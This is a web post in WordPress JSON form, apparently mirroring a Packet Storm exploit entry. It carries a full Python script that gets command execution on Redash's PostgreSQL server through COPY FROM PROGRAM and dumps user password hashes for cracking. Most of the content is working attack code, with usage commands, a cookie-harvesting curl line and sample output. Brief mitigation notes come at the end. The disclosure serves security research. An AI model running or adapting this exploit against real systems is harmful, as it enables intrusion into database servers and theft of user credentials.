{"id":30052,"date":"2025-12-10T12:52:19","date_gmt":"2025-12-10T12:52:19","guid":{"rendered":"http:\/\/localhost\/?p=30052"},"modified":"2025-12-10T12:52:19","modified_gmt":"2025-12-10T12:52:19","slug":"redash-authenticated-remote-command-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=30052","title":{"rendered":"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672"},"content":{"rendered":"

{“lastseen”:”2025-12-10T17:37:21″,”description”:”Redash\u2019s default setup uses PostgreSQL superuser credentials for its primary data source. Because users can run SQL through Redash, any authenticated account gains excessive control over the database. This allows executing system commands on the…”,”published”:”2025-12-10T00:00:00″,”modified”:”2025-12-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Redash Authenticated Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212672″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”#!\/usr\/bin\/env python3\\n # -*- coding: UTF-8 -*-\\n # redash_rce_hash.py\\n #\\n # Redash Authenticated Remote Command Execution\\n #\\n # Jeremy Brown (jbrown3264\/gmail), Dec 2025\\n #\\n # =Intro=\\n #\\n # Redash’s default configuration uses PostgreSQL superuser credentials for data source\\n # connections. When combined with Redash’s intended SQL query execution capability,\\n # this enables authenticated users to:\\n #\\n # 1. Execute arbitrary system commands on the database server via PostgreSQL’s\\n # COPY FROM PROGRAM command\\n # 2. Extract password hashes from Redash’s internal users table via direct SQL queries\\n #\\n # The security issue comes from default configuration:\\n # – Redash’s default setup uses PostgreSQL superuser credentials for data sources\\n # – This grants high privileges to user-submitted queries\\n # – Combined with lack of database isolation, users can access Redash’s auth tables\\n #\\n # The vulnerability requires:\\n # – Authenticated user account on Redash\\n # – Instance configuration with the default PostgreSQL data source (superuser by default)\\n #\\n # Repo and Version Tested\\n # – https:\/\/github.com\/getredash\/redash\\n # – redash\/redash:25.8.0 (docker image)\\n #\\n # =Usage=\\n #\\n # redash_rce_hash.py \\u003curl\\u003e \\u003ccookie_file\\u003e [–cmd \\u003ccommand\\u003e | –dump]\\n #\\n # Example: redash_rce_hash.py http:\/\/localhost:5000 cookie.txt –cmd \\”id\\”\\n # Example: redash_rce_hash.py http:\/\/localhost:5000 cookie.txt –dump\\n #\\n # Get cookie from command line (requires user:pass in creds.txt):\\n # $ IFS=: read user pass \\u003c creds.txt; curl -sk -c cookie.txt -b cookie.txt -X POST \\\\\\n # http:\/\/localhost:5000\/login \\\\\\n # -d \\”email=$user\\u0026password=$pass\\u0026csrf_token=$(curl -s -c cookie.txt http:\/\/localhost:5000\/login \\\\\\n # | grep -oP ‘(?\\u003c=name=\\\\\\”csrf_token\\\\\\” value=\\\\\\”)[^\\\\\\”]*’)\\” \\u003e\/dev\/null 2\\u003e\\u00261\\n #\\n # =Testing=\\n #\\n # $ docker ps | grep redash\\n # redash\/nginx:latest 0.0.0.0:80-\\u003e80\/tcp, [::]:80-\\u003e80\/tcp redash-nginx-1\\n # redash\/redash:25.8.0 5000\/tcp redash-adhoc_worker-1\\n # redash\/redash:25.8.0 5000\/tcp redash-scheduler-1\\n # redash\/redash:25.8.0 5000\/tcp redash-scheduled_worker-1\\n # redash\/redash:25.8.0 5000\/tcp redash-worker-1\\n # redash\/redash:25.8.0 0.0.0.0:5000-\\u003e5000\/tcp, [::]:5000-\\u003e5000\/tcp redash-server-1\\n # pgautoupgrade\/pgautoupgrade:17-alpine 5432\/tcp redash-postgres-1\\n # redis:7-alpine 6379\/tcp redash-redis-1\\n #\\n # $ .\/redash_rce_hash.py http:\/\/localhost:5000 cookie.txt –cmd \\”ps\\”\\n # [*] Executing command: ps\\n #\\n # PID USER TIME COMMAND\\n # 1 root 0:00 bash \/usr\/local\/bin\/docker-entrypoint.sh postgres\\n # 9 postgres 0:00 postgres\\n # 31 postgres 0:00 postgres: checkpointer\\n # 32 postgres 0:00 postgres: background writer\\n # 34 postgres 0:00 postgres: walwriter\\n # 35 postgres 0:00 postgres: autovacuum launcher\\n # 36 postgres 0:00 postgres: logical replication launcher\\n # 101 postgres 0:00 postgres: postgres postgres 172.18.0.5(52788) idle\\n # …..\\n # 324 postgres 0:00 postgres: postgres postgres 172.18.0.6(54688) COPY\\n # 325 postgres 0:00 postgres: postgres postgres 172.18.0.4(41116) authentication\\n # 326 postgres 0:00 ps\\n #\\n # =Mitigation=\\n #\\n # Maintainers were responsive and decided not to make code changes as they view\\n # it as a configuration issue rather than product vulnerability, as more secure\\n # database configuration (vs default) may prevent exploitation.\\n #\\n # This may be mitigated by:\\n # – Using non-superuser database credentials for data sources\\n # – Revoking access to sensitive columns (e.g. password_hash) via column-level permissions\\n # – Isolating Redash’s internal database from user-accessible data sources\\n #\\n \\n import sys\\n import time\\n import hashlib\\n import requests\\n from http.cookiejar import MozillaCookieJar\\n from urllib3.exceptions import InsecureRequestWarning\\n \\n requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\\n \\n def load_cookies(path):\\n jar = MozillaCookieJar()\\n jar.load(path, ignore_discard=True, ignore_expires=True)\\n return {c.name: c.value for c in jar}\\n \\n def normalize_url(url):\\n url = url.rstrip(‘\/’)\\n \\n if url.startswith(‘http:\/\/’) or url.startswith(‘https:\/\/’):\\n return url\\n \\n for protocol in [‘https:\/\/’, ‘http:\/\/’]:\\n test_url = f\\”{protocol}{url}\\”\\n try:\\n resp = requests.head(test_url, verify=False, timeout=3)\\n return test_url\\n except:\\n pass\\n \\n return f\\”http:\/\/{url}\\”\\n \\n def find_api_path(base_url, cookies):\\n session = requests.Session()\\n session.cookies.update(cookies)\\n \\n paths = [\\n \\”\/api\/query_results\\”,\\n \\”\/default\/api\/query_results\\”,\\n \\”\/org\/api\/query_results\\”,\\n ]\\n \\n for path in paths:\\n url = f\\”{base_url}{path}\\”\\n try:\\n resp = session.post(url, json={\\”query\\”: \\”SELECT 1\\”, \\”data_source_id\\”: 1, \\”parameters\\”: {}}, verify=False, timeout=5)\\n if resp.status_code in [200, 400]:\\n return path\\n except:\\n pass\\n \\n return paths[0]\\n \\n def execute_rce(base_url, cookies, command):\\n session = requests.Session()\\n session.cookies.update(cookies)\\n \\n api_path = find_api_path(base_url, cookies)\\n endpoint = f\\”{base_url}{api_path}\\”\\n \\n table = f\\”rce_{hashlib.md5(command.encode()).hexdigest()[:8]}\\”\\n \\n payload = {\\n \\”query\\”: f\\”CREATE UNLOGGED TABLE IF NOT EXISTS {table} AS SELECT ‘1’ WHERE 1=0; COPY {table} FROM PROGRAM ‘{command}’; SELECT * FROM {table}\\”,\\n \\”data_source_id\\”: 1,\\n \\”parameters\\”: {}\\n }\\n \\n resp = session.post(endpoint, json=payload, verify=False, timeout=30)\\n \\n if resp.status_code != 200:\\n raise RuntimeError(f\\”Query submission failed: HTTP {resp.status_code} – check credentials \/ session expiration\\”)\\n \\n result = resp.json()\\n \\n # Handle synchronous response\\n if ‘query_result’ in result:\\n rows = result[‘query_result’][‘data’][‘rows’]\\n return [row.get(‘?column?’, ”) for row in rows if row.get(‘?column?’)]\\n \\n # Handle asynchronous response (poll job)\\n job_id = result.get(‘job’, {}).get(‘id’)\\n if not job_id:\\n raise RuntimeError(f\\”Failed to submit query: {result}\\”)\\n \\n # Poll for completion\\n deadline = time.time() + 60\\n while time.time() \\u003c deadline:\\n job_url = f\\”{base_url}\/api\/jobs\/{job_id}\\”\\n job_resp = session.get(job_url, verify=False, timeout=15)\\n \\n if job_resp.status_code != 200:\\n raise RuntimeError(f\\”Failed to poll job: HTTP {job_resp.status_code}\\”)\\n \\n job = job_resp.json().get(‘job’, {})\\n \\n if job.get(‘status’) == 3: # Complete\\n result_id = job.get(‘query_result_id’)\\n for res_path in [f\\”\/api\/query_results\/{result_id}\\”, f\\”\/default\/api\/query_results\/{result_id}\\”]:\\n try:\\n url = f\\”{base_url}{res_path}\\”\\n res = session.get(url, verify=False, timeout=30)\\n if res.status_code == 200:\\n rows = res.json()[‘query_result’][‘data’][‘rows’]\\n return [row.get(‘?column?’, ”) for row in rows if row.get(‘?column?’)]\\n except:\\n pass\\n raise RuntimeError(\\”Could not fetch query results\\”)\\n \\n if job.get(‘status’) == 4: # Failed\\n raise RuntimeError(f\\”Job failed: {job.get(‘error’)}\\”)\\n \\n time.sleep(0.5)\\n \\n raise TimeoutError(\\”Job did not complete\\”)\\n \\n def extract_password_hashes(base_url, cookies):\\n session = requests.Session()\\n session.cookies.update(cookies)\\n \\n api_path = find_api_path(base_url, cookies)\\n endpoint = f\\”{base_url}{api_path}\\”\\n \\n # SQL injection payload to extract email and password hash\\n payload = {\\n \\”query\\”: \\”SELECT email, password_hash FROM users\\”,\\n \\”data_source_id\\”: 1,\\n \\”parameters\\”: {}\\n }\\n \\n resp = session.post(endpoint, json=payload, verify=False, timeout=30)\\n \\n if resp.status_code != 200:\\n raise RuntimeError(f\\”Query submission failed: HTTP {resp.status_code} – check credentials \/ session expiration\\”)\\n \\n result = resp.json()\\n \\n # Handle synchronous response\\n if ‘query_result’ in result:\\n rows = result[‘query_result’][‘data’][‘rows’]\\n hash_list = []\\n for row in rows:\\n email = row.get(’email’) or ”\\n password_hash = row.get(‘password_hash’) or ”\\n if password_hash and password_hash.startswith(‘$’) and email:\\n hash_list.append((email, password_hash))\\n return hash_list\\n \\n # Handle asynchronous response (poll job)\\n job_id = result.get(‘job’, {}).get(‘id’)\\n if not job_id:\\n raise RuntimeError(f\\”Failed to submit query: {result}\\”)\\n \\n # Poll for completion\\n deadline = time.time() + 60\\n while time.time() \\u003c deadline:\\n job_url = f\\”{base_url}\/api\/jobs\/{job_id}\\”\\n job_resp = session.get(job_url, verify=False, timeout=15)\\n \\n if job_resp.status_code != 200:\\n raise RuntimeError(f\\”Failed to poll job: HTTP {job_resp.status_code}\\”)\\n \\n job = job_resp.json().get(‘job’, {})\\n \\n if job.get(‘status’) == 3: # Complete\\n result_id = job.get(‘query_result_id’)\\n for res_path in [f\\”\/api\/query_results\/{result_id}\\”, f\\”\/default\/api\/query_results\/{result_id}\\”]:\\n try:\\n url = f\\”{base_url}{res_path}\\”\\n res = session.get(url, verify=False, timeout=30)\\n if res.status_code == 200:\\n rows = res.json()[‘query_result’][‘data’][‘rows’]\\n hash_list = []\\n for row in rows:\\n email = row.get(’email’) or ”\\n password_hash = row.get(‘password_hash’) or ”\\n if password_hash and password_hash.startswith(‘$’) and email:\\n hash_list.append((email, password_hash))\\n return hash_list\\n except:\\n pass\\n raise RuntimeError(\\”Could not fetch query results\\”)\\n \\n if job.get(‘status’) == 4: # Failed\\n raise RuntimeError(f\\”Job failed: {job.get(‘error’)}\\”)\\n \\n time.sleep(0.5)\\n \\n raise TimeoutError(\\”Job did not complete\\”)\\n \\n def main():\\n if len(sys.argv) \\u003c 3:\\n print(f\\”Usage: {sys.argv[0]} \\u003curl\\u003e \\u003ccookie_file\\u003e [–cmd \\u003ccommand\\u003e | –dump]\\”, file=sys.stderr)\\n print(f\\”\\”, file=sys.stderr)\\n print(f\\”Examples:\\”, file=sys.stderr)\\n print(f\\” {sys.argv[0]} http:\/\/localhost:5000 cookie.txt –cmd ‘id’\\”, file=sys.stderr)\\n print(f\\” {sys.argv[0]} http:\/\/localhost:5000 cookie.txt –dump\\”, file=sys.stderr)\\n sys.exit(1)\\n \\n url, cookie_file = sys.argv[1], sys.argv[2]\\n \\n # Determine mode (default: –dump)\\n mode = \\”–dump\\”\\n command = None\\n \\n if len(sys.argv) \\u003e 3:\\n if sys.argv[3] == \\”–cmd\\”:\\n mode = \\”–cmd\\”\\n if len(sys.argv) \\u003c 5:\\n print(\\”Error: –cmd requires a command argument\\”, file=sys.stderr)\\n sys.exit(1)\\n command = sys.argv[4]\\n elif sys.argv[3] == \\”–dump\\”:\\n mode = \\”–dump\\”\\n else:\\n print(f\\”Error: Unknown option {sys.argv[3]}\\”, file=sys.stderr)\\n sys.exit(1)\\n \\n try:\\n url = normalize_url(url)\\n cookies = load_cookies(cookie_file)\\n \\n if mode == \\”–cmd\\”:\\n print(f\\”[*] Executing command: {command}\\\\n\\”, file=sys.stderr)\\n output = execute_rce(url, cookies, command)\\n for line in output:\\n print(line)\\n else: # –dump\\n print(f\\”[*] Extracting password hashes…\\”, file=sys.stderr)\\n hash_list = extract_password_hashes(url, cookies)\\n print(f\\”[*] Found {len(hash_list)} password hashes\\\\n\\”, file=sys.stderr)\\n \\n if not hash_list:\\n print(\\”No password hashes found\\”, file=sys.stderr)\\n sys.exit(1)\\n \\n # Output format: email on one line, hash on next line\\n # Also write just hashes to hashes.txt for hashcat\\n with open(‘hashes.txt’, ‘w’) as hash_file:\\n for email, password_hash in hash_list:\\n print(email)\\n print(password_hash + \\”\\\\n\\”)\\n hash_file.write(password_hash + ‘\\\\n’)\\n \\n print(f\\”[*] Hashes written to hashes.txt\\”, file=sys.stderr)\\n \\n except Exception as e:\\n print(f\\”Error: {e}\\”, file=sys.stderr)\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212672″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212672\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-10T17:37:21″,”description”:”Redash\u2019s default setup uses PostgreSQL superuser credentials for its primary data source. Because users can run SQL through Redash, any authenticated account gains excessive control…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-30052","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=30052\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-10T17:37:21″,”description”:”Redash\u2019s default setup uses PostgreSQL superuser credentials for its primary data source. Because users can run SQL through Redash, any authenticated account gains excessive control...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=30052\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-10T12:52:19+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672\",\"datePublished\":\"2025-12-10T12:52:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052\"},\"wordCount\":1981,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30052#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052\",\"name\":\"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-10T12:52:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30052\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30052#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=30052","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672 - zero redgem","og_description":"{“lastseen”:”2025-12-10T17:37:21″,”description”:”Redash\u2019s default setup uses PostgreSQL superuser credentials for its primary data source. Because users can run SQL through Redash, any authenticated account gains excessive control...","og_url":"https:\/\/zero.redgem.net\/?p=30052","og_site_name":"zero redgem","article_published_time":"2025-12-10T12:52:19+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=30052#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=30052"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672","datePublished":"2025-12-10T12:52:19+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=30052"},"wordCount":1981,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=30052#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=30052","url":"https:\/\/zero.redgem.net\/?p=30052","name":"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-10T12:52:19+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=30052#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=30052"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=30052#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Redash Authenticated Remote Command Execution_PACKETSTORM:212672"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30052","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30052"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30052\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30052"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30052"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30052"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}